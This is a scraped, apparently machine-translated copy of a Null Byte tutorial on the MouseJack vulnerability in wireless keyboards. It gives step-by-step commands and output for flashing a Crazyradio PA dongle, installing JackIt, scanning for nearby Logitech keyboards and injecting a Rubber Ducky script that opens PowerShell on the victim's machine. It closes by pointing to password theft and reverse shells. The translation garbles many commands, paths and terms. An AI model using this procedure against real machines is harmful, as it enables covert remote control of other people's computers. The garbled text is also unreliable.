قالب وردپرس درنا توس
Home / Tips and Tricks / Injecting Keystrokes into Logitech Keyboards with a Transceiver nRF24LU1 + «Null Byte :: WonderHowTo

Injecting Keystrokes into Logitech Keyboards with a Transceiver nRF24LU1 + «Null Byte :: WonderHowTo



MouseJack vulnerabilities were reported more than three years ago. Some manufacturers of wireless keyboards have since released firmware updates, but millions (if not billions) of keyboards worldwide are not patched, either because they can not be updated or because the manufacturer has never bothered to release one.

According to Bastille, "MouseJack is a vulnerability class that affects the vast majority of wireless keyboards and mice without Bluetooth." Under the direction of Marc Newlin, MouseJack uses the readiness of a USB dongle (see below), unencrypted keystrokes from to accept surrounding devices.

by tokyoneon / Null Byte [19659005] However, the concept of snooping and injection of keystrokes was first published in 2010 by Thorsten Schroeder and Max Moser. Later, Travis Goodspeed published "Promiscuity is the nRF24L01 + & # 39; s Duty", which expanded the duo's work. Samy Kamkar debuted in 2015 with KeySweeper, an Arduino-based USB charger designed to passively detect and log keyboard keystrokes from Microsoft keyboards.

Marc discovered that wireless mice and keyboards were made by AmazonBasics, Dell, Gigabyte, HP, Lenovo, Logitech, and Microsoft were all affected by many of the MouseJack vulnerabilities. An attacker with a Crazyradio PA device (nRF24LU1 +) can insert keystrokes into most of these USB dongles, as well as listen to keystrokes and perform denial-of-service attacks. Ultimately, the attacker can compromise and remotely control a computer up to 250 feet away.

Buy a Crazyradio PA-USB Long-Range Radio Dongle: Amazon | Bitcraze

Crazyradio PA-USB radio dongle based on the nRF24LU1 + from Nordic Semiconductor. Image by tokyoneon / Null Byte

To follow the instructions below, you will need a nRF24LU1 + radio transceiver such as Crazyradio PA or similar.

Step 1: Flashing the firmware

started, new nRF24LU1 + hardware needs to be flashed with custom firmware to scan for vulnerable devices and enter keystrokes. First, make sure Kali's APT package index is up to date:

  ~ $ apt-get update 

Multiple dependencies are required to run the Python scripts used to build and automate the Flash Processes are used. Use the following command apt-get to make sure that Git, Python, and other required packages are installed and up-to-date.

  ~ $ apt-get install sdcc binutils python python-pip git

Read package lists ... Done
Create dependency tree
Status information is read ... Done
python is already the latest version (2.7.16-1).
python-pip is already the latest version (18.1-5).
The following packages were automatically installed and are no longer needed:
libpython3.6-minimal libpython3.6-stdlib python3.6 python3.6-minimal
Use & sudo apt autoremove & # 39; to remove it.
The following additional packages will be installed:
binutils-common binutils-x86-64-linux-gnu gputils gputils-common gputils-doc libbinutils sdcc-doc sdcc-library
Suggested packages:
binutils-doc sdcc-ucsim
The following NEW packages will be installed:
gputils gputils-common gputils-doc sdcc sdcc-doc sdcc libraries
The following packages are being updated:
binutils binutils-common binutils-x86-64-linux-gnu libbinutils
4 updated, 6 reinstalled, 0 removed and 108 not updated.
Requires 9,868 kB of archives.
After this process, 63.7 MB of additional space will be used.
Would you like to continue? [Y/n] 

The version of PIP available in the Kali repository may be outdated. Update it with the following command.

  ~ $ pip install --upgrade pip

Collect pip
Download from https://files.pythonhosted.org/packages/f9/fb/863012b13912709c13cf5cfdbfb304fa6c727659d6290438e1a88df9d848/pip-19.1-py2.py3-none-any.whl (1.4 MB)
100% | ████████████████████████████████ | 1.4 MB 114 kB / s
Install collected packages: pip
Found existing installation: pip 18.1
Uninstallation of pip under /usr/lib/python2.7/dist-packages, outside environment / usr not possible
Can & # 39; pip & # 39; do not uninstall. No files to uninstall found.
Successfully installed pip-19.1 

Further dependencies must be installed with PIP. Use the option -I when installing the PyUSB package, a Python USB access module.

  ~ $ pip install --upgrade -I pyusb

REDUCTION: Python 2.7 will reach the end of its lifespan on January 1, 2020. Please update your Python as Python 2.7 will not be serviced after this date. A future version of pip will discontinue support for Python 2.7.
Collect pyusb
Download from https://files.pythonhosted.org/packages/5f/34/2095e821c01225377dda4ebdbd53d8316d6abb243c9bee43d3888fa91dd6/pyusb-1.0.2.tar.gz (54kB)
| ████████████████████████████████ | 61 kB 82 kB / s
Building wheels for collective packaging: Pyusb
Building wheel for pyusb (setup.py) ... done
Filed in directory: /root/.cache/pip/wheels/1f/a9/7e/d189b5030ee3a56f9b72c28281bb11d661b8ea312e28de08a5
Pyusb successfully built
Install collected packages: pyusb
Successfully Installed pyusb 1.0.2 

Finally, install the latest PlatformIO package, an open source ecosystem for IoT development.

  ~ $ pip install - upgrade platformio

Collect platform
Download from https://files.pythonhosted.org/packages/fe/01/69aa7d8ef8cd74493338396ff86dc1bbfe85ae58b77fc705924c920a38eb/platformio-3.6.7-py27-none-any.whl (161kB)
| ████████████████████████████████ | 163 kB 92 kB / s
Collect Pyserial! = 3.3, <4,> = 3 (by platformio)
Download from https://files.pythonhosted.org/packages/0d/e4/2a744dd9e3be04a0c0907414e2a01a7c88bb3915cbe3c8cc06e209f59c30/pyserial-3.4-py2.py3-none-any.whl (193kB)
| ████████████████████████████████ | 194 kB 179 kB / s
Requirement already met, upgrade will be skipped: Requirements <3,> = 2.4.0 in /usr/lib/python2.7/dist-packages (by platformio) (2.21.0)
Collective click <6,> = 5 (by platformio)
Download from https://files.pythonhosted.org/packages/8f/98/14966b6d772fd5fba1eb3bb34a62a7f736d609572493397cdc5715c14514/click-5.1-py2.py3-none-any.whl (65kB)
| ████████████████████████████████ | 71 kB 188 kB / s
Prerequisite already met, upgrade skipped: colorama in /usr/lib/python2.7/dist-packages (by platformio) (0.3.7)
Collection bottle <0.13 (from platform)
Download from https://files.pythonhosted.org/packages/32/4e/ed046324d5ec980c252987c1dca191e001b9f06ceffaebf037eef469937c/bottle-0.12.16.tar.gz (72kB)
| ████████████████████████████████ | 81 kB 153 kB / s
Collecting the semantics version <3,> = 2.5.0 (from platformio)
Download from https://files.pythonhosted.org/packages/72/83/f76958017f3094b072d8e3a72d25c3ed65f754cc607fdb6a7b33d84ab1d5/semantic_version-2.6.0.tar.gz
Building wheels for bulk packaging: bottle, semantic version
Baurad for bottle (setup.py) ... finished
Filed in: /root/.cache/pip/wheels/0c/68/ac/1546dcb27101ca6c4e50c5b5da92dbd3307f07cda5d88e81c7
Building wheel for semantic version (setup.py) ... done
Saved in the directory: /root/.cache/pip/wheels/60/bb/50/215d669d31f992767f5dd8d3c974e79261707ee7f898f0dc10
Successfully built bottle semantics version
Install collected packages: pyserial, click, bottle, semantic-version, platformio
Existing installation found: Click 7.0
Uninstalling Click-7.0:
Click-7.0 successfully uninstalled
Bottle-0.12.16 click-5.1 platform-3.6.7 pyserial-3.4 semantic-version-2.6.0 

Step 2: Clone the MouseJack repository

Clone the MouseJack repository of scripts in GitHub the directory / opt.

  ~ $ git clone https://github.com/BastilleResearch/mousejack/opt/mousejack

Cloning in & # 39; / opt / mousejack & # 39; ...
remote: List objects: 285, done.
Remote: Total 285 (Delta 0), reused 0 (Delta 0), pack-reused 285
Receive objects: 100% (285/285), 8.63 MiB | 353.00 KiB / s, done.
Deltas resolve: 100% (131/131), done. 

Change to the new mousejack / directory.

  ~ $ cd / opt / mousejack / 

Use the submodule init options to initialize the local configuration file for the nrf-research-firmware . This is the firmware that is flashed to the nRF24LU1 + device.

  / opt / mousejack $ git submodule init

Submodule # research-firmware & # 39; (https://github.com/BastilleResearch/nrf-research-firmware.git) registered for path #rnr-research-firmware & # 39; 

Then use Submodule Update . Options to retrieve all data and check out the corresponding commit list.

  / opt / mousejack $ git submodule update

Cloning in & # 39; / opt / mousejack / nrf-research-firmware & # 39; ...
Submodule_path #rf-research-firmware #: checked out # 02b84d1c4e59c0fb98263c83b2e7c7f9863a3b93 & # 39; 

Change to the directory & # 39; nrf-research-firmware / & # 39 ;.

  / opt / mousejack $ cd nrf-research-firmware / [196501]  make  Command to execute the commands in the Makefile. 

  / nrf-research-firmware $ make

mkdir -p am
sdcc - model-large --std-c99 -c src / main.c -o bin / main.rel
sdcc - model-large --std-c99 -c src / usb.c -o bin / usb.rel
sdcc - model-large --std-c99 -c src / usb_desc.c -o bin / usb_desc.rel
sdcc --model-large --std-c99 -c src / radio.c -o bin / radio.rel
sdcc --xram-loc 0x8000 --xram-size 2048 - model-large bin / main.rel bin / usb.rel bin / usb_desc.rel bin / radio.rel -o bin / dongle.ihx
objcopy -I ihex bin / dongle.ihx -O bin / dongle.bin
objcopy --pad-to 26622 --gap-fill 255 -I ihex bin / dongle.ihx -O bin / dongle.formatted.bin
objcopy -I binary bin / dongle.formatted.bin -O ihex bin / dongle.formatted.ihx 

At this point, the device nRF24LU1 + should be inserted into the computer. Then execute the command make install .

  / nrf-research-firmware $ make install

./prog/usb-flasher/usb-flash.py bin / dongle.bin
[2019-04-25 23:55:44.351] Looking for a compatible device that can jump to the Nordic bootloader
[2019-04-25 23:55:44.378] Found device that jumps to the Nordic bootloader
[2019-04-25 23:55:44.969] Looking for a device with the Nordic bootloader
[2019-04-25 23:55:45.171] Write a picture in the flash
[2019-04-25 23:55:45.808] Write review
[2019-04-25 23:55:45.867] Firmware Programming completed successfully
[2019-04-25 23:55:45.867] Please unplug your dongle or breakout board and plug it back in. 

Disconnect the nRF24LU1 + from the computer as instructed. To check if the firmware has been flashed, reconnect the nRF24LU1 + device to the computer and use the command dmesg . The product and production lines should be "Research Firmware" or "RFStorm".

  / nrf-research-firmware $ dmesg

[ 2433.986481] USB 2-1: New full speed USB device number 3 with xhci_hcd
[ 2434.136930] USB 2-1: New USB device found, idVendor = 1915, idProduct = 0102, bcdDevice = 0.01
[ 2434.136938] USB 2-1: New USB Device Strings: Mfr = 1, Product = 2, SerialNumber = 0
[ 2434.136942] usb 2-1: Product: Research Firmware
[ 2434.136946] usb 2-1: Developer: RFStorm 

Step 3: Cloning the JackIt Repository

Now that the nRF24LU1 + device is set up, you can now search the environment for wireless mice and keyboards. The MouseJack repository contains several great Python scripts. Instead, we use the JackIt script to automate keyboard input.

JackIt was developed by phikshun and infamy and is an automation tool for using USB Rubber Ducky scripts

First, download the JackIt repository.

  ~ $ git clone https://github.com/insecurityofthings/jackit.git/opt/ jackit

Cloning in & # 39; / opt / jackit & # 39; ...
remote: listing objects: 718, done.
Remote: Total 718 (Delta 0), reused 0 (Delta 0), pack-reused 718
Receive objects: 100% (718/718), 171.39 KiB | 153.00 KiB / s, done.
Resolve deltas: 100% (439/439), done. 

Change to the new directory jackit /.

  ~ $ cd / opt / jackit / 

List the contents of the directory.

  / opt / jackit $ ls -la

a total of 48
drwxr-xr-x 6 root root 4096 April 26 22:25.
drwxr-xr-x 6 root root 4096 Apr 26 22:25 ..
drwxr-xr-x 2 root root 4096 Apr 26 22:25 am
drwxr-xr-x 2 root root 4096 April 26 22:25 Examples
drwxr-xr-x 8 root root 4096 Apr 26 22:25 .git
-rw-r - r-- 1 root root 1072 April 26 22:25 .gitignore
drwxr-xr-x 5 root root 4096 April 26 22:25 jackit
-rw-r - r-- 1 root root 4743 April 26 22:25 README.md
-rw-r - r-- 1 root root 52 April 26 22:25 requirements.txt
-rwxr-xr -x 1 root root 594 Apr 26 22:25 setup.py
-rw-r - r-- 1 root root 289 26 Apr 22:25 tox.ini 

We find a "requirements.txt" file. This indicates that multiple dependencies should be installed with PIP. That's it for the setup.

  / opt / jackit $ pip install -e.

Get file: /// opt / jackit
Prerequisite already fulfilled: Click == 5.1 in /usr/local/lib/python2.7/dist-packages (from JackIt == 0.1.0) (5.1)
Collect Pyusb == 1.0.0 (from JackIt == 0.1.0)
Download from https://files.pythonhosted.org/packages/8a/19/66fb48a4905e472f5dfeda3a1bafac369fbf6d6fc5cf55b780864962652d/PyUSB-1.0.0.tar.gz (52kB)
| ████████████████████████████████ | 61 kB 81 kB / s
Collecting six == 1.10.0 (from JackIt == 0.1.0)
Download from https://files.pythonhosted.org/packages/c8/0a/b6723e1bc4c516cb687841499455a8505b44607ab535be01091c0f24f079/six-1.10.0-py2.py3-none-any.whl
Collection table == 0.7.5 (by JackIt == 0.1.0)
Download from https://files.pythonhosted.org/packages/db/40/6ffc855c365769c454591ac30a25e9ea0b3e8c952a1259141f5b9878bd3d/tabulate-0.7.5.tar.gz
Building wheels for collected packages: Pyusb, tabular
Building wheel for pyusb (setup.py) ... done
Filed in directory: /root/.cache/pip/wheels/a6/69/c7/258e736ee9bdb4553bd9701424b259436b979cf96201af612f
Build tabulate (setup.py) ... done
Filed in: /root/.cache/pip/wheels/96/9c/9a/369b6376b11523584a6040a89488c28f0f88cb52167dceb648
Successfully created pyusb tabulate
Install collected packages: pyusb, six, tabulate, JackIt
Found available installation: pyusb 1.0.2
Uninstall Pyusb-1.0.2:
Pyusb 1.0.2 successfully uninstalled
Found existing installation: six 1.12.0
Uninstall Six-1.12.0:
Six-1.12.0 successfully uninstalled
Running setup.py for JackIt develop
Successfully installed JackIt pyusb-1.0.0 six-1.10.0 tabulate-0.7.5 

Step 4: Attack on wireless keyboards and mice

Browse the environment for vulnerable devices by simply jackit in any terminal.

  ~ Jackit

____. __ .___ __
| | ____ ____ | | _ | | / | _
|  __  _ / ___  | | / /  __ 
/  __ | | / __ \  ___ | <|   ||  |
________(____  /___  > __ | _  ___ || __ |
 /  /  /
JackIt version 1.00
Created by Phikshun, shame

[!] You must specify a ducky script with --script. 
[!]   Attacks are disabled.
[+] Scan is started ...

[+] Scan CTRL-C every 5 seconds when done.

IMPORTANT ADDRESS CHANNELS COUNT THE PACKAGE SEEN
----- -------------- -------------------- ------- ---- ------- ------------ --------------------------- -
1 C7: D4: 21: 98: 07 74 3 Before 0:00:07 am Logitech HID 00: C2: 00: 00: 03: 10: 00: 00: 00: 2B 

JackIt continuously scans the area for wireless Connections mice and keyboards. A vulnerable device identifies its address (serial number), channel, and type in the terminal. This information can be used for a targeted attack. For example, with the following payload of USB Rubber Ducky, you can open a run window and insert keystrokes into the target computer.

  GUI r
DELAY 1000
STRING Powershell 
ENTER 

To use the USB Rubber Ducky script with JackIt, use the following command.

  ~ $ jackit --reset --address C7: D4: 21: 98: 07 - vendor Logitech --script / path / to /ducky/script.txt[19659014lightboxesPress Ctrl  +  c  to stop the scan. JackIt asks to which address the keys should be pressed. This is a targeted attack so only one serial number is displayed in the scan. Press  1  and then  Enter . 

  [+] Sniffing for C7: D4: 21: 98: 07 every 5s CTRL-C when you're ready.

IMPORTANT ADDRESS CHANNELS COUNT THE PACKAGE SEEN
----- -------------- ---------- ------- ----------- --- --------- -----------------------------
1 C7: D4: 21: 98: 07 2 1 0:00:10 before Logitech HID 00: C2: 00: 00: 00: 00: 00: 00: 00: 00: 00
^ C

[+] Select the destination keys (1-1) with commas or & # 39; all & # 39; separated from: [all]: 1
[+] Ping Success on Channel 65
[+] Sending an Attack on Channel 65 at C7: D4: 21: 98: 07 [Logitech HID]

[+]  All Attacks Complete 

When the keystrokes are entered, the device executes the following commands:

The Ducky script opens the Run window and gives the following text. More complex PowerShell attacks can include filtering out Wi-Fi passwords, streaming the Windows 10 desktop, and Powercat reverse shells with payload hosted on Microsoft servers. Since Marc and Bastille released the MouseJack white paper in 2016, some manufacturers have released firmware updates for products that do not use a single-programmable memory (PROM). Most vulnerable USB dongles can not be patched due to hardware limitations. This does not apply to Logitech devices that need to be patched manually. Other manufacturers have pushed firmware updates and continue to use an unknown number of vulnerable products worldwide.

Thank you for reading! If you have any questions, you can leave a comment here or send me a message on Twitter @tokyoneon_ .

Do Not Miss: MouseJack That Have not Happened & Affected Wireless Mice and Keyboards Has Been Updated

Title Picture and GIF by tokyoneon / Zero Byte




Source link